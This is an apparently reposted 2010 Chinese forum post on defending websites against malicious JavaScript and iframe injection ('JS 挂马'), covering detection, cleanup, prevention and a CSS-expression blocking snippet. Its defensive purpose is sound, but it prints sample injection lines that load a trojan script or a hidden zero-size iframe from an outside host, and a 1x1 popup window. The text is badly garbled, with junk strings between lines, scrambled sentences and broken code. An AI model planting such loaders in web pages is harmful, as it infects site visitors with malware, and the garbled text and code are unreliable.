搜索
查看: 11565|回复: 0

网站被JS挂马解决方法

[复制链接]
发表于 2010-11-10 08:17:49 | 显示全部楼层 |阅读模式

网站被JS挂马解决方法

! I6 Y2 s9 B- \# N& Z

为什么网页挂马还是屡见不鲜?这恐怕就要说一说 CSS 挂马了下面我详细讨论 虽然能够巧妙地利用 CSS 代码防范

2 \- r k/ b3 r0 q* L8 j

IFRAME 和 JS 脚本挂马。

# l0 \$ B& X) ]. G# B6 x: M

检测网页木马也是很重要的一项工作,目前流行的网站被黑,相应的 asp,

) q$ C/ r, Q" ~' Y

网站优化设计当中。htm,j 等文件中,插入以 js 调用方式的本文主要介绍网页挂马的种类、如何检测网页是否被挂马、

7 h$ l6 z: c @

如何清除网页木马。如何防止网页被挂马。
1: 网页挂马的种类 .

% b+ ] v; i* \$ L% O

相应的 asp, 目前流行的网站被黑。htm,j 等文件中,插入以 js 调用方式的

D* y( o( d! s

卢松松以前做过的极品源码下载站 ’ 就遇到过 JS 挂马

2 {4 ?% e1 K m$ @1 p: x) e& F* ~

利用动网程序漏洞 ( 上传附件漏洞 ) 拥有网站管理员权限。删了论坛几千条数据 , 校园闹翻天论坛 ’ 就遇到用户提权

+ e: ]2 P# Z1 `! T/ e) U

。一千多位会员的 ID

' V+ L% X/ ^+ I7 \; e! R( W) C, |

2: 如何检测网页是否被挂马。

* r2 q! X; b; B" E4 `

六款免费网页平安检测工具横向测评 ( 华军软件园 )
1 专业检测工具。>

7 x5 L& f0 G0 f

或者可以利用 Googl 搜索你网站、博客进行检测。如果有网站有木马则 googl 会在搜索列表的下方提示该网站有不安全

6 o* {; \" S' L1 d" a1 F

因素。
2 googl 检测。>

) }9 w. s" Y6 o

常用的杀毒软件也可以检测出来。
3 杀毒软件检测。>

: Y2 J1 H5 _: Q

打开你网站、博客,
4 人工检测。点击右键查看源文件,根据网页挂马的种类也可以查看是否中了木马。

: h6 t ?8 t# ?- Z9 Y9 ?

5 使用 McAfee SiteAdvisor 平安浏览网页的插件。

0 J8 l9 K) f; o I( N

; S7 O! i1 z3 ?, r

3: 如何清除网页木马。

/ {! t" z6 \& W0 q6 P4 Q6 N) C' {

就看那些文件是最近修改过的主要检查这些新文件, 一旦中了网页木马。从 FTP 中可以检查文件最近修改时间。然后进

/ s9 S$ V" F, \% @. t: g8 q

入源文件把相关的网页挂马种类的可疑代码删除。

( g& p& d" Z, ]% G

建议删除所有文件 ( 数据库、图片、文档、顺序模板主题等文件夹可以保留 ) 如果你对你所使用的网站、博客程序不熟

! Q& M- P/ J: s0 @

悉。>

; m; }2 J! e: c }, y# Z

请从预防开始吧。
4: 如何防止网页被挂马。如果你网站还没有被挂马。>

) }$ @; D9 M7 U0 }! [1 i: c) [

并只允许信任的人使用上传程序。
1 对网友开放上传附件功能的网站一定要进行身份认证。>

{" Q; e- F. M- D, v( a6 D- c

2 保证你所使用的顺序及时的更新。

* y z' Z9 i) G' j6 s, k, q. g

3 不要在前台网页上加注后台管理程序登陆页面的链接。

* v. u6 x6 n+ O7 r3 X* X

但不要把备份数据库放在顺序默认的备份目录下。
4 要时常备份数据库等重要文件。>

, U5 ]- r9 G( T* r5 n8 L/ e/ O) T" q

不能过于简单。
5 管理员的用户名和密码要有一定复杂性。>

- g( n/ X+ |" S" f& a$ R

二项功能组合,
6 IIS 中禁止写入和目录禁止执行的功能。可以有效的防止 ASP 木马。

3 H+ L# \5 I1 n. ]

设置执行权限选项中,
7 可以在服务器、虚拟主机控制面板。直接将有上传权限的目录,取消 ASP 运行权限。

! _9 i$ ^# [- D" {: K% u% w3 o

8 创建一个 robots.txt 上传到网站根目录。 Robot 能够有效的防范利用搜索引擎窃取信息的骇客

) s! y7 o4 N+ A2 `5 z4 y+ l

* O) y ~' W5 O9 j

IFRAME 挂马比较早, < IFRAME 挂马比较早。相应的预防措施也比较多,其中用 CSS 配合 JS 脚本进行预防是主流方式

! _ O' T W" Z

。可这种预防方式也存在平安隐患, JS 脚本也可以被用来挂马,令人防不胜防。下面要介绍反击 JS 挂马的方法。

7 Y* N% r8 O- p0 H; b) p+ `0 A% q* a

JS 挂马溯源

* @( S) D$ ]# d" Z/ _# _

有经验的平安工程师也开始研究相应的对策,当 IFRAME 逐渐被黑客滥用的时候。一段时间内各种阻止 IFRAME 挂马的方

, F4 X5 l; ~! t8 R$ o: Y1 f+ a

法不时涌现,其中通用性较高的就是利用 CSS 配合 JS 脚本防御 IFRAME 挂马。

7 F" g1 @% f" o0 Z c! p

很多网站都会让网页调用 JS 脚本来实现广告等诸多特效,而黑客也发现。如果将木马挂在 JS 脚本中,所有调用该 JS

* F( k! | |5 o2 B) p

脚本的网页都等同于被挂上了木马,对于需要肉鸡群的黑客而言是一劳永逸,因此 JS 脚本挂马逐渐开始被黑客应用。

4 A2 P b/ C- k' W4 P! X

一种面向对象的脚本语言,小百科: JS 脚本是 JavaScript 脚本语言的简称。目前广泛用于动态网页的编程。需要提示

) v" Z; a( y' z0 g" ?8 [& I4 w

大家的 JavaScript 和 Java 除了语法上有一些相似之处,以及都能够当作网页的编程语言以外,两者是完全不相干的而

, p1 Y$ M8 J! ]: X' W

JavaScript 与 Jscript 也不同, Jscript 微软为了迎战 JavaScript 推出的脚本语言。

# X) v+ Y) e4 o, s3 d" ~$ d* x

但是 JavaScript 一门具有丰富特性的语言,虽然 JavaScript 作为给非程序人员的脚本语言向大众推广。有着和其他编

. o5 q: ~8 m/ B7 z2 |; ^/ l

程语言一样的复杂性。实际上,必需对 JS 有扎实的理解才干用它来编写比较复杂的顺序,作为一名平安工程师,掌握 JS

' T% u) f( z0 J7 ?6 K: a$ ?

脚本在工作中会有很大的协助。

$ I% `& u% o7 z' a) G

挂马原理一点通

" u3 D% t+ S1 T

可以说优点多得数不过来, JS 脚本挂马对于黑客而言。首先 JS 脚本在挂马时可以直接将 JS 代码写在网页中,也可以

! Z% T6 J) j% E" P1 n% Q0 A) p

通过注入网页,让网站远程调取异地 JS 脚本。此外, JS 挂马插入 Web 页面的方法有几十种,绝对够菜鸟们眼花缭乱,

3 n) P3 K7 E5 h

无从区分木马在何处。

( {$ b, e! p6 y1 s6 M5 {# B6 G

如同一个穿着鲜红颜色外衣的劫匪, IFRAME 挂马相对于安全工程师而言。招摇而扎眼,很容易被发现。但是利用 JS 挂

) t1 `9 m6 T) I3 u% ]

马就意味着这个劫匪拥有了一张可以随时变换的面孔,而且它还能够随时更换衣服。这样的劫匪在平安工程师搜查时,很

+ P( O' y2 B1 O4 t$ c

容易蒙混过关,导致木马久杀不绝。

. ~' M3 L1 T0 \, Z

JS 挂马攻防实录

, D* p( v% T. G3 j# z

一种是直接将 JavaScript 脚本代码写在网页中,攻现在最多见的 JS 挂马方法有两种。当访问者在浏览网页时,恶意的

/ L4 [* R' ~6 A# m! r

挂马脚本就会通过用户的浏览器悄悄地打开网马窗口,隐藏地运行。

- ]6 @0 m: r* R& D, U

这种方法使用的关键代码如下:

- k3 i; G# T5 R/ e) D9 f+ n- K

"",  window.open "http://www.v404.cn/ 木马

, d! s0 q" s5 ]

.html"."toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1" ;

- H5 j/ {) K5 Z

; `5 M( ?2 ]9 p; N a6 r: G

很容易被安全工程师发现,这种代码往往很长。而且没有经验的黑客也喜欢将 “ width 和 “ height= 参数设为 “ 0

; }% P0 b3 I( D% G

但是设置为 0 后,可能会出现恶意代码不运行的情况。

2 m Y0 e8 l3 K( l

并上传到自己指定的网址。这时黑客只需要在受害者的网站中写入: 另外一种 JS 挂马方式是黑客先将挂马脚本代码 “

% l/ q5 j+ S' Z$ c, c/ g6 M+ d

document.writ ' < Iframe src=" 网页木马地址 " ></ifram > ' 写入 Window 中的写字板另存为后缀为 .j 脚本文件

3 R) B5 W% \% p; }, q

6 \. ]; ^. }9 a8 P, p. C: x

<script src="http://www.v404.cn/ 木马脚本 .js"></script>

) ]& e/ Y# ^- ~8 {# V

7 t3 Y2 R' M& @) C. O8 o

或者

3 t H6 L$ r; N

document.writ "<div style='display:none'>"

. ]( _5 Z7 z7 U4 T, G, {

document.writ "<ifram src=" 网页木马地址 " width="0" height="0" scrolling="no" frameborder="0"></iframe>"

% }/ K4 k% h7 ~/ o0 l3 v

document.writ "</div>"
 

; u! ]8 m. w+ X8 q* ^1 l. L

! p/ B" N& e; B, ^3 H; [

就成功地将木马挂到对方的网页中了

; s3 I/ ~( U9 B: l' ?8 o

例如黑客有可能会将脚本写为: 小提示:黑客还可以根据情况随机变换拔出的 JS 挂马方法。

4 S: C: T% j) B/ Y( B

<div style="behaviour: url http://www.v404.cn/ 木马脚本 .j ;">

1 _. M7 ^8 N: u$ e) n4 u

或者:

$ M3 b/ R, {8 F+ f& q

<ifram src="vbscript:[ 挂马脚本 ]">

- ?' W* O% x: L, C! J) B% E

7 t4 H2 T6 _( u" o6 T


等等 …

3 M" C- l/ Z1 [& [* Q

不方便,防第一种 JS 挂马方式。用得非常少,而第二种 JS 挂马方式才是当前主流的所以我主要针对它进行防御。方法

" E# O$ B1 W% h O) _8 ?" P

就是阻止 Src 请求的异地外域的 JS 脚本,代码如下:

5 q6 c, A+ n) J& L, |

iframe{mdy1:express this.src='about:blank', <  iframe{mdy1:express this.src='about:blank'.this.outerHTML=''

* h! S$ N5 [) u1 Y8 d$ c5 E7 K

;}

. M, s0 P1 {) X% u

script{mzm2:express this.src.toLowerCas .indexOf 'http' ==0 ?document.writ ' 木马被成功隔离 !' :'' ;}
 

5 V7 `' P7 h5 B/ h4 D3 c( g1 |# O- v

5 i& Q3 N2 k! L+ @& t/ @

不过这种方法的缺点就是网站的访问者将不能看到被挂了 JS 木马的相关网页。

5 v. A) E) w: Q9 k* d) g

这段代码会让异地外域的 JS 文件在使用 document.writ 时,所以我为安全工程师提供了一段可以中止 JS 脚本运行的

. o0 m# L, a. W) b" ^0 W/ x( Y: Q

CSS 代码。被 document.clos 强制关闭。这个时侯 JS 挂马的内容往往还没有来得及写完,只有局部被强制输出了

1 _% A" y1 t* A

Writer 后面的内容再不会被写入访问者的电脑中,从而起到防范 JS 脚本挂马的作用。

. Z0 W! W& C( \' |" r5 H

<title> 让 JS 挂马中止的 CSS 代码 </title>

! r% s7 `6 C$ z( u$ f

<styl type="text/css" id="shudoo">

! r) h1 n, U8 W9 w- d

/*<![CDATA[*/

3 y) T2 c% ]) Z5 c* \6 w

this.outerHTML='' ;iframe{mdy1:express this.src='about:blank'.}

. Z/ ^, F" C6 _8 Z: B) e; c9 U

script{mzm2:express this.src.indexOf 'http' ==0 ?document.clos :'' ;}

# E3 d. \7 U1 R8 V

/*]]>*/

* {* ?3 \3 }0 u5 D: s- e: h

</style>

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册帐号

本版积分规则

热议作品
精华帖子排行
精彩推荐

虾皮社区,成立十年了!

站长自己也搞不懂想做个什么,反正就是一直在努力的做!

Copyright © 2007-2019 xp6.org Powered by Discuz

QQ|Archiver|手机版|小黑屋|虾皮社区 鲁公网安备 37021102000261号 |网站地图
返回顶部 返回列表